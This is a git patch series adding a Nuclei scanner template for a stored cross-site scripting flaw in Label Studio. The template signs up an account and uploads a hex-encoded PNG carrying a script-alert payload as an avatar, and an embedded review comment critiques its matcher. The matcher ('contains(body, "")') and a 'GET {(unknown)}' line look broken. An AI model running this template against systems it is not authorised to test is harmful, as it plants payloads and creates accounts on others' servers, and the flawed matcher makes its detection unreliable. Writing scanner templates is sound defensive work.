From fa5123e17d60042de869cd4e8843a7eea624af43 Mon Sep 17 00:00:00 2001
From: isacaya
Date: Tue, 30 Jan 2024 01:49:31 +0900
Subject: [PATCH 1/3] Create CVE-2023-47115.yaml
---
 http/cves/2023/CVE-2023-47115.yaml | 81 ++++++++++++++++++++++++++++++
 1 file changed, 81 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-47115.yaml
diff --git a/http/cves/2023/CVE-2023-47115.yaml b/http/cves/2023/CVE-2023-47115.yaml
new file mode 100644
index 0000000000..c840b9961b
--- /dev/null
+++ b/http/cves/2023/CVE-2023-47115.yaml
@@ -0,0 +1,81 @@
+id: CVE-2023-47115
+
+info:
+ name: Stored Cross-Site Scripting Vulnerability in Label Studio
+ author: isacaya
+ severity: high
+ description: Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.
+ impact: |
+ Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image.
+ remediation: |
+ Update to version 1.9.2.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-47115
+ - https://github.com/advisories/GHSA-q68h-xwq5-mm7x
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
+ cvss-score: 7.1
+ cve-id: CVE-2023-47115
+ cwe-id: CWE-79
+ tags: cve,cve2023,xss,authenticated
+
+http:
+ - raw:
+ - |
+ GET /user/login/ HTTP/1.1
+ Host: {{Hostname}}
+ - |
+ POST /user/signup/?&next=/projects/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false
+ - |
+ GET /api/current-user/whoami HTTP/1.1
+ Host: {{Hostname}}
+ - |
+ POST /api/users/{{id}}/avatar/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF
+
+ ------WebKitFormBoundarytZZRQ9D2LS0PMsHF
+ Content-Disposition: form-data; name="avatar"; filename="nuclei.html"
+ Content-Type: image/png
+
+ {{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}}
+ ------WebKitFormBoundarytZZRQ9D2LS0PMsHF
+ - |
+ GET /api/current-user/whoami HTTP/1.1
+ Host: {{Hostname}}
+ - |
+ GET {(unknown)} HTTP/1.1
+ Host: {{Hostname}}
+
+ extractors:
+ - type: xpath
+ name: csrftoken
+ internal: true
+ attribute: value
+ xpath:
+ - '/html/body/div/form/input'
+ - type: json
+ part: body
+ name: id
+ internal: true
+ json:
+ - '.id'
+ - type: json
+ part: body
+ name: filename
+ internal: true
+ json:
+ - '.avatar'
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - "contains(header, 'text/html')"
+ - "status_code == 200"
+ - 'contains(body, "")'
+ condition: and
\ No newline at end of file
From 8e2cd75674baf17ba60a10dc20e27dcaea5906a1 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Tue, 30 Jan 2024 13:25:56 +0530
Subject: [PATCH 2/3] fix-formatting
---
 http/cves/2023/CVE-2023-47115.yaml | 18 ++++++++++++++----
 1 file changed, 14 insertions(+), 4 deletions(-)
diff --git a/http/cves/2023/CVE-2023-47115.yaml b/http/cves/2023/CVE-2023-47115.yaml
index c840b9961b..b0ea4e139c 100644
--- a/http/cves/2023/CVE-2023-47115.yaml
+++ b/http/cves/2023/CVE-2023-47115.yaml
@@ -1,10 +1,11 @@ id: CVE-2023-47115 info: - name: Stored Cross-Site Scripting Vulnerability in Label Studio + name: Label Studio - Stored Cross-Site Scripting author: isacaya severity: high - description: Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website. + description: | + Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website. impact: | Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. remediation: |
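Review bot: The last DSL matcher in this hunk, `'contains(body, "")'`, is vacuous — every body contains the empty string — so combined with `status_code == 200` and a `text/html` header it fires on any HTML document served at the extracted `.avatar` path and never confirms that the uploaded payload was actually reflected. The IDAT chunk in the hex-encoded PNG decodes to `<script>alert(document.domain)</script>`, so the matcher should pin that exact string: `- 'contains(body, "<script>alert(document.domain)</script>")'`; if the empty string is only a rendering artifact of this page, the check is already as intended. Separately, a successful run registers a throwaway account and stores the XSS payload as that account's avatar, and the template has no cleanup request, so a comment above the `http:` block such as `# Intrusive: creates a user account and persists the avatar payload on the target; remove both manually after testing` would make the side effects explicit to operators (a DELETE step could be added only if the avatar API supports removal, which is not visible here).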
@@ -12,12 +13,19 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-47115 - https://github.com/advisories/GHSA-q68h-xwq5-mm7x + - https://docs.djangoproject.com/en/4.2/ref/views/#serving-files-in-development + - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/functions.py#L18-L49 + - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/urls.py#L25-L26 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L cvss-score: 7.1 cve-id: CVE-2023-47115 cwe-id: CWE-79 - tags: cve,cve2023,xss,authenticated + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-1649949475 + tags: cve,cve2023,xss,authenticated,intrusive,label-studio http: - raw:
@@ -58,12 +66,14 @@ http: attribute: value xpath: - '/html/body/div/form/input' + - type: json part: body name: id internal: true json: - '.id' + - type: json part: body name: filename
@@ -78,4 +88,4 @@ http: - "contains(header, 'text/html')" - "status_code == 200" - 'contains(body, "")' - condition: and
\ No newline at end of file
+ condition: and
From 9e7e8525c56a33206841081ffac0d7e925bc0b31 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 30 Jan 2024 22:36:51 +0530
Subject: [PATCH 3/3] Update CVE-2023-47115.yaml
---
 http/cves/2023/CVE-2023-47115.yaml | 14 +++++++++-----
 1 file changed, 9 insertions(+), 5 deletions(-)
diff --git a/http/cves/2023/CVE-2023-47115.yaml b/http/cves/2023/CVE-2023-47115.yaml
index b0ea4e139c..37186eefb2 100644
--- a/http/cves/2023/CVE-2023-47115.yaml
+++ b/http/cves/2023/CVE-2023-47115.yaml
@@ -1,7 +1,7 @@ id: CVE-2023-47115 info: - name: Label Studio - Stored Cross-Site Scripting + name: Label Studio - Cross-Site Scripting author: isacaya severity: high description: |
@@ -11,19 +11,19 @@ info: remediation: | Update to version 1.9.2. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-47115 - https://github.com/advisories/GHSA-q68h-xwq5-mm7x - https://docs.djangoproject.com/en/4.2/ref/views/#serving-files-in-development - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/functions.py#L18-L49 - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/urls.py#L25-L26 + - https://nvd.nist.gov/vuln/detail/CVE-2023-47115 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L cvss-score: 7.1 cve-id: CVE-2023-47115 cwe-id: CWE-79 metadata: + max-request: 6 verified: true - max-request: 1 shodan-query: http.favicon.hash:-1649949475 tags: cve,cve2023,xss,authenticated,intrusive,label-studio
@@ -32,15 +32,18 @@ http: - | GET /user/login/ HTTP/1.1 Host: {{Hostname}} + - | POST /user/signup/?&next=/projects/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false + - | GET /api/current-user/whoami HTTP/1.1 Host: {{Hostname}} + - | POST /api/users/{{id}}/avatar/ HTTP/1.1 Host: {{Hostname}}
@@ -52,9 +55,11 @@ http: {{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}} ------WebKitFormBoundarytZZRQ9D2LS0PMsHF + - | GET /api/current-user/whoami HTTP/1.1 Host: {{Hostname}} + - | GET {(unknown)} HTTP/1.1 Host: {{Hostname}}
@@ -81,11 +86,10 @@ http: json: - '.avatar' - matchers-condition: and matchers: - type: dsl dsl: - - "contains(header, 'text/html')" - "status_code == 200" + - "contains(header, 'text/html')" - 'contains(body, "")' condition: and